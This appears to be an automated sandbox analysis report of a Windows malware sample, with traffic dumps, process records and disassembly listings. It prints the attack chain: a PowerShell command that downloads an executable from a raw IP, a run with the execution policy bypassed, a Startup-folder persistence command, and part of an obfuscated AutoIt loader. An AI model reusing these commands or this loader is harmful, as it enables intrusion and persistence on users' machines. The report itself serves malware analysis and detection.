                                                          Jan 2, 2025 10:54:56.815224886 CET1236INData Raw: c0 74 15 56 8b 75 08 57 8b f8 a5 a5 a5 5f 5e 89 03 8b c3 5b 5d c2 04 00 33 c0 eb f3 55 8b ec 5d e9 64 06 00 00 55 8b ec 83 ec 18 b9 b0 77 4c 00 56 8b 75 08 57 56 e8 60 13 00 00 8b 0d 10 78 4c 00 8b 04 81 8b 38 83 7f 14 00 75 2f 3b 75 0c 0f 84 9b
                                                          Data Ascii: tVuW_^[]3U]dUwLVuWV`xL8u/;uEEQuj VI_^]we3@UW}tVu9=txLdxLEeepxL=txL5xxL}uejjMQPVIPudxL
                                                          Jan 2, 2025 10:54:56.815233946 CET1236INData Raw: 75 0c ff 75 fc e8 5c 0a 00 00 5e 5b 8b e5 5d c2 10 00 83 78 48 ff 75 e6 56 ff 75 0c 68 38 01 00 00 e9 31 a0 03 00 55 8b ec 83 e4 f8 83 ec 5c 53 56 57 ff 75 08 b9 b0 77 4c 00 e8 88 0e 00 00 8b 0d 10 78 4c 00 8b 04 81 8b 18 8d 44 24 28 50 89 5c 24
                                                          Data Ascii: uu\^[]xHuVuh81U\SVWuwLxLD$(P\$30IF%hxLD$%dxLtxLxxLlxLpxLPF0ID$D$D$D$D$P3pIjt$t$W0I
                                                          Jan 2, 2025 10:54:56.815257072 CET1236INData Raw: 14 51 68 80 09 49 00 68 70 09 49 00 50 ff 75 08 e8 0d 01 00 00 8b 75 0c 89 06 85 c0 0f 84 82 00 00 00 8b 45 14 83 4e 4c ff 66 89 86 88 00 00 00 8b 45 18 68 10 09 00 00 66 89 86 8a 00 00 00 66 89 9e 8c 00 00 00 66 89 be 8e 00 00 00 e8 a5 ef 01 00
                                                          Data Ascii: QhIhpIPuuENLfEhfffU3Yxxp8t99u1f_^[]$JO2UEVW3F98u[FE=%~E7tEDED
                                                          Jan 2, 2025 10:54:56.815268040 CET1236INData Raw: 00 00 8b 0d 34 78 4c 00 8b 55 fc 42 89 55 fc 3b d1 0f 8e 56 ff ff ff 8b 75 08 83 7f 20 00 0f 85 bb 9b 03 00 83 7f 24 00 0f 85 bf 9b 03 00 8b 15 10 78 4c 00 8b 04 b2 8b 08 85 c9 74 0c 51 e8 ea eb ff ff 8b 15 10 78 4c 00 8b 04 b2 83 20 00 8b 15 d0
                                                          Data Ascii: 4xLUBU;Vu $xLtQxL wLJwL;5xLuxLxL_^u5wLRI%wLxLtxLD8uxL]UMxLSVWwLu]jE(I
                                                          Jan 2, 2025 10:54:56.815356970 CET896INData Raw: 8b f8 eb ac 83 c8 ff eb c3 33 ff eb 85 46 3b f1 7c d1 eb d6 55 8b ec 56 8b 75 08 57 8b f9 85 f6 74 24 6a eb 56 ff 15 5c 06 49 00 3b 47 78 73 16 8b 4f 74 8b 0c 81 8b 09 85 c9 74 0a 39 31 75 06 5f 5e 5d c2 04 00 83 c8 ff eb f5 55 8b ec 56 8b 75 08
                                                          Data Ascii: 3F;|UVuWt$jV\I;GxsOtt91u_^]UVuWt$jV\I;GdsO`t91u_^]UQS3wLV3wL@wLWwLwLwLwLwLwLwL=wLwLwLwLwLj^
                                                          Jan 2, 2025 10:54:56.815372944 CET1236INData Raw: 53 50 ff 15 cc 04 49 00 8b 45 f4 2b 45 ec 6a 00 ff 35 04 78 4c 00 6a 00 ff 75 24 50 8b 45 f0 2b 45 e8 50 ff 75 20 ff 75 0c 53 ff 75 08 68 00 09 49 00 ff 75 1c ff 15 20 07 49 00 89 07 85 c0 0f 84 d2 96 03 00 56 6a eb 50 ff 15 10 05 49 00 8b 45 24
                                                          Data Ascii: SPIE+Ej5xLju$PE+EPu uSuhIu IVjPIE$GEG<E G@EP74IE+EGDE+EjjGHIPj07IjWwL\=wLuh@j(jjIwLwLwLj5xLG_^[] 3
                                                          Jan 2, 2025 10:54:56.820266962 CET1236INData Raw: 01 00 00 00 ff 24 95 be 32 40 00 ff 75 24 ff 75 20 ff 75 1c ff 75 18 ff 75 14 ff 75 10 57 56 53 e8 97 ed ff ff 8b 55 08 84 c0 0f 84 c9 9d 03 00 8b 4d 28 88 96 90 00 00 00 88 8e 91 00 00 00 a1 1c 78 4c 00 a3 48 78 4c 00 89 3d 44 78 4c 00 f6 c1 01
                                                          Data Ascii: $2@u$u uuuuWVSUM(xLHxL=DxL}ujVS4{Pu1{Tu6>tWj6IM,4_^[]4EtsPW[sTWYeCC'CECcCCCC


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.549705139.99.188.12480940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2025 10:54:59.105448961 CET73OUTGET /kYCQj.txt HTTP/1.1
                                                          Host: 139.99.188.124
                                                          Connection: Keep-Alive
                                                          Jan 2, 2025 10:54:59.965117931 CET1236INHTTP/1.1 200 OK
                                                          Date: Thu, 02 Jan 2025 09:54:59 GMT
                                                          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                          Last-Modified: Mon, 16 Dec 2024 15:40:22 GMT
                                                          ETag: "1301c2-62964ffa2f293"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 1245634
                                                          Keep-Alive: timeout=5, max=100
                                                          Connection: Keep-Alive
                                                          Content-Type: text/plain
                                                          Data Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24 4f 64 48 42 74 20 3d 20 32 38 20 54 6f 20 38 36 35 0a 49 66 20 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 32 20 54 68 65 6e 0a 53 71 72 74 28 37 39 35 35 29 0a 46 69 6c 65 45 78 69 73 74 73 28 [TRUNCATED]
                                                          Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $OdHBt = 28 To 865If $VerifiedUnderstoodValidation = 32 ThenSqrt(7955)FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUnderstoodValidation = 33 ThenConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5))DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2))Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUndersto
                                                          Jan 2, 2025 10:54:59.965145111 CET1236INData Raw: 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 20 54 68 65 6e 0a 24 4e 75 74 74 65 6e 49 6e 76 65 73 74 6f 72 73 52 61 6c 65 69 67 68 20 3d 20 44 65 63 28 57 61 6c 65 73 28 22 31 30 34 5d 31 31 33 5d 31 30 35 5d 38 36 5d 38 35 5d 39 36 5d 38
                                                          Data Ascii: odValidation = 34 Then$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]83]73]78]127]105]97]79]105]77",28/4))ExitLoopEndIfNext$LAYERSSTRICTINNOVATIVE = '66150718350940696046327902621'$DmModsQueries = 68$DRESSDEARANTIQUES = 93Wh
                                                          Jan 2, 2025 10:54:59.965156078 CET1236INData Raw: 6c 4c 69 62 72 61 72 69 61 6e 53 70 69 72 69 74 55 20 3d 20 24 54 68 65 6f 72 65 74 69 63 61 6c 4c 69 62 72 61 72 69 61 6e 53 70 69 72 69 74 55 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 54 68 65 6f 72 65 74 69 63 61 6c 4c 69 62 72 61 72 69 61
                                                          Data Ascii: lLibrarianSpiritU = $TheoreticalLibrarianSpiritU + 1EndIfIf $TheoreticalLibrarianSpiritU = 18 Then$locateheadquarterssuccessfully = PixelGetColor(Wales("82]124]123]88]85]72]105]73]102]127]126]82]119",5/1), Wales("82]124]123]88]85]72]105]73]
                                                          Jan 2, 2025 10:54:59.965164900 CET1236INData Raw: 37 29 29 0a 41 53 69 6e 28 39 39 32 29 0a 24 6d 69 73 73 69 6f 6e 73 67 72 65 65 6e 68 6f 75 73 65 20 3d 20 24 6d 69 73 73 69 6f 6e 73 67 72 65 65 6e 68 6f 75 73 65 20 2b 20 31 0a 45 6e 64 49 66 0a 49 66 20 24 6d 69 73 73 69 6f 6e 73 67 72 65 65
                                                          Data Ascii: 7))ASin(992)$missionsgreenhouse = $missionsgreenhouse + 1EndIfIf $missionsgreenhouse = 96 Then$broughtisnicholasearned = ASin(9631)ExitLoopEndIfIf $missionsgreenhouse = 97 ThenDriveStatus(Wales("87]120]118]101]109]107]108]120]39",24/6
                                                          Jan 2, 2025 10:54:59.965177059 CET1236INData Raw: 38 32 30 39 32 34 34 35 32 39 39 32 31 34 37 37 33 30 37 33 33 38 33 32 39 35 39 38 31 37 38 33 37 31 39 31 34 39 36 37 34 34 35 38 38 30 38 27 0a 24 44 49 4c 44 4f 53 59 49 45 4c 44 53 46 41 52 45 41 44 44 52 45 53 53 45 44 20 3d 20 33 36 0a 24
                                                          Data Ascii: 82092445299214773073383295981783719149674458808'$DILDOSYIELDSFAREADDRESSED = 36$PERFECTRYAN = 64For $mdowmhS = 37 To 500If $DILDOSYIELDSFAREADDRESSED = 35 ThenPixelGetColor(107, 354, 0)Dec(Wales("76]97]107]101]115]42]73]110]115]116]97]11
                                                          Jan 2, 2025 10:54:59.965190887 CET1236INData Raw: 38 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73 28 22 39 33 5d 31 31 37 5d 31 32 33 5d 31 31 36 5d 31 30 36 5d 35 33 22 2c 33 30 2f 35 29 29 0a 43 68 72 28 38 37 37 39 29 0a 24 4c 65 73 73 50 68 6f 6e 65 20 3d 20 24 4c 65 73 73 50 68
                                                          Data Ascii: 8)DriveStatus(Wales("93]117]123]116]106]53",30/5))Chr(8779)$LessPhone = $LessPhone + 1EndIfIf $LessPhone = 28 Then$adipexeditcarl = DriveStatus(Wales("79]104]75]82]80]116]89]86]125]114]75]75]81]125]90]115]95]79]128",56/8))ExitLoopEndIf
                                                          Jan 2, 2025 10:54:59.965205908 CET1236INData Raw: 73 74 65 64 44 69 65 44 6f 63 73 20 2b 20 31 0a 45 6e 64 49 66 0a 57 45 6e 64 0a 24 54 61 62 6c 65 44 69 73 63 75 73 73 65 73 52 61 70 69 64 6c 79 48 69 73 74 6f 72 69 63 61 6c 20 3d 20 27 39 38 37 37 37 39 35 31 33 37 30 34 33 31 35 32 31 31 36
                                                          Data Ascii: stedDieDocs + 1EndIfWEnd$TableDiscussesRapidlyHistorical = '9877795137043152116883331283765251278672396181174893270'$COACHCELLULAR = 24$AIMEDSENZSHOPSMIXER = 90For $hIEQQvE = 18 To 472If $COACHCELLULAR = 23 ThenACos(2564)Chr(8142)ASi
                                                          Jan 2, 2025 10:54:59.965279102 CET1000INData Raw: 6e 65 4c 69 63 65 6e 73 65 20 2b 20 31 0a 45 6e 64 49 66 0a 57 45 6e 64 0a 24 42 61 73 6b 65 74 73 4e 65 61 72 43 75 62 61 20 3d 20 27 35 35 38 34 37 38 32 34 35 37 35 34 32 36 31 37 30 36 32 37 31 38 32 31 30 30 30 38 27 0a 24 48 65 72 65 62 79
                                                          Data Ascii: neLicense + 1EndIfWEnd$BasketsNearCuba = '5584782457542617062718210008'$HerebyFaq = 55$MultiCordlessFlexRepublicans = 73While 548If $HerebyFaq = 54 ThenACos(3326)ATan(8817)Dec(Wales("78]105]124]40]40]40]40",56/7))$HerebyFaq = $Hereb
                                                          Jan 2, 2025 10:54:59.965291023 CET1236INData Raw: 5d 31 32 35 5d 31 30 38 5d 31 31 33 5d 31 31 30 5d 31 32 34 5d 31 30 33 5d 31 32 31 5d 31 32 30 5d 31 32 34 5d 31 31 34 5d 31 32 35 5d 31 31 34 5d 31 32 30 5d 31 31 39 5d 31 31 34 5d 31 31 39 5d 31 31 32 5d 31 30 33 22 2c 34 35 2f 35 29 29 0a 50
                                                          Data Ascii: ]125]108]113]110]124]103]121]120]124]114]125]114]120]119]114]119]112]103",45/5))PixelGetColor(111, 395, 0)$IllnessFolk = $IllnessFolk + 1EndIfNextFunc BukkakeButterRebound($DISPLAYEDACIDSVERMONTFREDERICK, $AIRCRAFTSCANNEDMAINTAIN)$Immedi
                                                          Jan 2, 2025 10:54:59.965302944 CET1236INData Raw: 30 0a 46 6f 72 20 24 48 79 52 58 65 76 4d 20 3d 20 35 36 20 54 6f 20 33 33 30 0a 49 66 20 24 52 45 4a 45 43 54 52 45 53 45 52 56 4f 49 52 4c 4f 43 4b 45 4e 4a 4f 59 45 44 20 3d 20 38 37 20 54 68 65 6e 0a 45 78 70 28 32 30 31 36 29 0a 50 69 78 65
                                                          Data Ascii: 0For $HyRXevM = 56 To 330If $REJECTRESERVOIRLOCKENJOYED = 87 ThenExp(2016)PixelGetColor(Wales("66]111]98]109]112]104]34]71]102]98]117]34]66]109]104]102]115]106]98]34]83]102]99]112]118]111]101]34",2/2), Wales("66]111]98]109]112]104]34]71]10
                                                          Jan 2, 2025 10:54:59.970227003 CET1236INData Raw: 32 2c 20 30 29 0a 41 43 6f 73 28 34 33 35 36 29 0a 24 56 61 63 61 6e 63 69 65 73 4c 61 75 64 65 72 64 61 6c 65 42 69 72 6d 69 6e 67 68 61 6d 4c 61 6e 64 73 20 3d 20 24 56 61 63 61 6e 63 69 65 73 4c 61 75 64 65 72 64 61 6c 65 42 69 72 6d 69 6e 67
                                                          Data Ascii: 2, 0)ACos(4356)$VacanciesLauderdaleBirminghamLands = $VacanciesLauderdaleBirminghamLands + 1EndIfIf $VacanciesLauderdaleBirminghamLands = 28 Then$DiscoIllegal = 29$SubstituteVancouverBeta = 77For $qgBSwQeo = 86 To 289If $DiscoIllegal =


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:04:54:51
                                                          Start date:02/01/2025
                                                          Path:C:\Users\user\Desktop\cxZuGa.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Users\user\Desktop\cxZuGa.exe"
                                                          Imagebase:0x7ff7ec120000
                                                          File size:1'083'904 bytes
                                                          MD5 hash:243E64FA2B25BBA3E6C710DE1BDD4B0C
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:04:54:52
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell -Command "Invoke-WebRequest -Uri "http://139.99.188.124/TSKUVpnJ" -OutFile "C:\Users\Public\Guard.exe""
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:04:54:52
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:4
                                                          Start time:04:54:57
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
                                                          Imagebase:0x7ff7be880000
                                                          File size:452'608 bytes
                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:5
                                                          Start time:04:54:57
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:6
                                                          Start time:04:55:00
                                                          Start date:02/01/2025
                                                          Path:C:\Users\Public\Guard.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3
                                                          Imagebase:0xc30000
                                                          File size:893'608 bytes
                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 8%, ReversingLabs
                                                          Reputation:moderate
                                                          Has exited:false

                                                          General

                                                          Target ID:7
                                                          Start time:04:55:03
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
                                                          Imagebase:0x790000
                                                          File size:236'544 bytes
                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:8
                                                          Start time:04:55:03
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff6d64d0000
                                                          File size:862'208 bytes
                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:10
                                                          Start time:04:55:15
                                                          Start date:02/01/2025
                                                          Path:C:\Windows\System32\wscript.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
                                                          Imagebase:0x7ff612dd0000
                                                          File size:170'496 bytes
                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                          General

                                                          Target ID:11
                                                          Start time:04:55:15
                                                          Start date:02/01/2025
                                                          Path:C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
                                                          Imagebase:0x5f0000
                                                          File size:893'608 bytes
                                                          MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 8%, ReversingLabs
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Disassembly

                                                          Reset < >

                                                            Execution Graph

                                                            Execution Coverage:2.4%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:10.9%
                                                            Total number of Nodes:1427
                                                            Total number of Limit Nodes:41
                                                            execution_graph 93235 7ff7ec15c51c 93236 7ff7ec15c567 93235->93236 93240 7ff7ec15c52b abort 93235->93240 93243 7ff7ec1555d4 15 API calls _set_fmode 93236->93243 93238 7ff7ec15c54e HeapAlloc 93239 7ff7ec15c565 93238->93239 93238->93240 93240->93236 93240->93238 93242 7ff7ec14925c EnterCriticalSection LeaveCriticalSection abort 93240->93242 93242->93240 93243->93239 93244 7ff7ec148fac 93245 7ff7ec14901c 93244->93245 93246 7ff7ec148fd2 GetModuleHandleW 93244->93246 93261 7ff7ec15b9bc EnterCriticalSection 93245->93261 93246->93245 93252 7ff7ec148fdf 93246->93252 93248 7ff7ec1490cb 93249 7ff7ec15ba10 _isindst LeaveCriticalSection 93248->93249 93251 7ff7ec1490f0 93249->93251 93250 7ff7ec1490a0 93253 7ff7ec1490b8 93250->93253 93257 7ff7ec15ada4 75 API calls 93250->93257 93254 7ff7ec1490fc 93251->93254 93260 7ff7ec149118 11 API calls 93251->93260 93252->93245 93262 7ff7ec149164 GetModuleHandleExW 93252->93262 93258 7ff7ec15ada4 75 API calls 93253->93258 93255 7ff7ec15aa8c 30 API calls 93255->93250 93257->93253 93258->93248 93259 7ff7ec149026 93259->93248 93259->93250 93259->93255 93260->93254 93263 7ff7ec14918e GetProcAddress 93262->93263 93264 7ff7ec1491b5 93262->93264 93263->93264 93265 7ff7ec1491a8 93263->93265 93266 7ff7ec1491c5 93264->93266 93267 7ff7ec1491bf FreeLibrary 93264->93267 93265->93264 93266->93245 93267->93266 93268 7ff7ec145328 93291 7ff7ec144cac 93268->93291 93271 7ff7ec145474 93323 7ff7ec1457e4 7 API calls __scrt_fastfail 93271->93323 93272 7ff7ec145344 93274 7ff7ec14547e 93272->93274 93276 7ff7ec145362 93272->93276 93324 7ff7ec1457e4 7 API calls __scrt_fastfail 93274->93324 93277 7ff7ec145387 93276->93277 93281 7ff7ec1453a4 __scrt_is_nonwritable_in_current_image __scrt_release_startup_lock 93276->93281 93299 7ff7ec15ada4 93276->93299 93278 7ff7ec145489 abort 93280 7ff7ec14540d 93306 7ff7ec145930 93280->93306 93281->93280 93320 7ff7ec149204 35 API calls FindHandler 93281->93320 93283 7ff7ec145412 93309 7ff7ec123730 93283->93309 93288 7ff7ec145435 93288->93278 93322 7ff7ec144e90 8 API calls 2 library calls 93288->93322 93290 7ff7ec14544c 93290->93277 93292 7ff7ec144cce __scrt_initialize_crt 93291->93292 93325 7ff7ec1465ec 93292->93325 93298 7ff7ec144cd7 93298->93271 93298->93272 93300 7ff7ec15adff 93299->93300 93301 7ff7ec15ade0 93299->93301 93300->93281 93301->93300 93374 7ff7ec1210e8 93301->93374 93379 7ff7ec121080 93301->93379 93384 7ff7ec121064 93301->93384 93389 7ff7ec121048 93301->93389 93639 7ff7ec146240 93306->93639 93310 7ff7ec1237a3 93309->93310 93311 7ff7ec123743 IsThemeActive 93309->93311 93321 7ff7ec145974 GetModuleHandleW 93310->93321 93641 7ff7ec1492d0 93311->93641 93317 7ff7ec12377d 93653 7ff7ec1237b0 93317->93653 93319 7ff7ec123785 SystemParametersInfoW 93319->93310 93320->93280 93321->93288 93322->93290 93323->93274 93324->93278 93326 7ff7ec1465f5 __vcrt_initialize_winapi_thunks __vcrt_initialize 93325->93326 93338 7ff7ec147290 93326->93338 93330 7ff7ec14660c 93331 7ff7ec144cd3 93330->93331 93345 7ff7ec1472d8 DeleteCriticalSection 93330->93345 93331->93298 93333 7ff7ec15ac84 93331->93333 93334 7ff7ec164340 93333->93334 93335 7ff7ec144ce0 93334->93335 93362 7ff7ec15dd2c 93334->93362 93335->93298 93337 7ff7ec146620 8 API calls 3 library calls 93335->93337 93337->93298 93341 7ff7ec147298 93338->93341 93340 7ff7ec1472c9 93351 7ff7ec1472d8 DeleteCriticalSection 93340->93351 93341->93340 93343 7ff7ec1465ff 93341->93343 93346 7ff7ec147614 93341->93346 93343->93331 93344 7ff7ec147218 8 API calls 3 library calls 93343->93344 93344->93330 93345->93331 93352 7ff7ec147310 93346->93352 93349 7ff7ec14765f InitializeCriticalSectionAndSpinCount 93350 7ff7ec147654 93349->93350 93350->93341 93351->93343 93353 7ff7ec14736c try_get_function 93352->93353 93354 7ff7ec147371 93352->93354 93353->93354 93355 7ff7ec1473a0 LoadLibraryExW 93353->93355 93358 7ff7ec147454 93353->93358 93360 7ff7ec147439 FreeLibrary 93353->93360 93361 7ff7ec1473fb LoadLibraryExW 93353->93361 93354->93349 93354->93350 93355->93353 93356 7ff7ec1473c1 GetLastError 93355->93356 93356->93353 93357 7ff7ec147462 GetProcAddress 93359 7ff7ec147473 93357->93359 93358->93354 93358->93357 93359->93354 93360->93353 93361->93353 93373 7ff7ec15b9bc EnterCriticalSection 93362->93373 93364 7ff7ec15dd3c 93365 7ff7ec15e258 32 API calls 93364->93365 93366 7ff7ec15dd45 93365->93366 93368 7ff7ec15db44 34 API calls 93366->93368 93372 7ff7ec15dd53 93366->93372 93367 7ff7ec15ba10 _isindst LeaveCriticalSection 93369 7ff7ec15dd5f 93367->93369 93370 7ff7ec15dd4e 93368->93370 93369->93334 93371 7ff7ec15dc30 GetStdHandle GetFileType 93370->93371 93371->93372 93372->93367 93394 7ff7ec141d80 93374->93394 93378 7ff7ec144f15 93378->93301 93451 7ff7ec127920 93379->93451 93381 7ff7ec12109e 93481 7ff7ec144ebc 34 API calls _onexit 93381->93481 93383 7ff7ec144f15 93383->93301 93535 7ff7ec127ec0 93384->93535 93386 7ff7ec12106d 93571 7ff7ec144ebc 34 API calls _onexit 93386->93571 93388 7ff7ec144f15 93388->93301 93620 7ff7ec127718 93389->93620 93393 7ff7ec144f15 93393->93301 93417 7ff7ec129640 93394->93417 93396 7ff7ec141db2 GetVersionExW 93420 7ff7ec127cf4 93396->93420 93398 7ff7ec12dda4 4 API calls 93399 7ff7ec141dfc 93398->93399 93399->93398 93400 7ff7ec141e87 93399->93400 93430 7ff7ec12dda4 93400->93430 93402 7ff7ec141ea4 93403 7ff7ec189645 93402->93403 93405 7ff7ec141f3c GetCurrentProcess IsWow64Process 93402->93405 93404 7ff7ec18964f 93403->93404 93434 7ff7ec1932f4 LoadLibraryA GetProcAddress 93404->93434 93406 7ff7ec141f7e __scrt_fastfail 93405->93406 93406->93404 93408 7ff7ec141f86 GetSystemInfo 93406->93408 93410 7ff7ec1210f1 93408->93410 93409 7ff7ec1896b1 93411 7ff7ec1896b5 93409->93411 93412 7ff7ec1896d7 GetSystemInfo 93409->93412 93416 7ff7ec144ebc 34 API calls _onexit 93410->93416 93435 7ff7ec1932f4 LoadLibraryA GetProcAddress 93411->93435 93414 7ff7ec1896bf 93412->93414 93414->93410 93415 7ff7ec1896f0 FreeLibrary 93414->93415 93415->93410 93416->93378 93436 7ff7ec144c68 93417->93436 93419 7ff7ec129663 93419->93396 93421 7ff7ec16d2c8 93420->93421 93422 7ff7ec127d0d 93420->93422 93423 7ff7ec12dda4 4 API calls 93421->93423 93425 7ff7ec127d24 93422->93425 93428 7ff7ec127d51 93422->93428 93424 7ff7ec16d2d3 93423->93424 93445 7ff7ec127e4c RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 93425->93445 93427 7ff7ec127d2f memcpy_s 93427->93399 93428->93424 93429 7ff7ec144c68 4 API calls 93428->93429 93429->93427 93431 7ff7ec12dda9 93430->93431 93433 7ff7ec12ddc7 memcpy_s 93430->93433 93431->93433 93446 7ff7ec12a7c0 93431->93446 93433->93402 93434->93409 93435->93414 93439 7ff7ec144c2c 93436->93439 93437 7ff7ec144c50 93437->93419 93439->93436 93439->93437 93442 7ff7ec14925c EnterCriticalSection LeaveCriticalSection abort 93439->93442 93443 7ff7ec145600 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 93439->93443 93444 7ff7ec145620 RtlPcToFileHeader RaiseException std::bad_alloc::bad_alloc _CxxThrowException 93439->93444 93442->93439 93444->93439 93445->93427 93448 7ff7ec12a7ed 93446->93448 93450 7ff7ec12a7dd memcpy_s 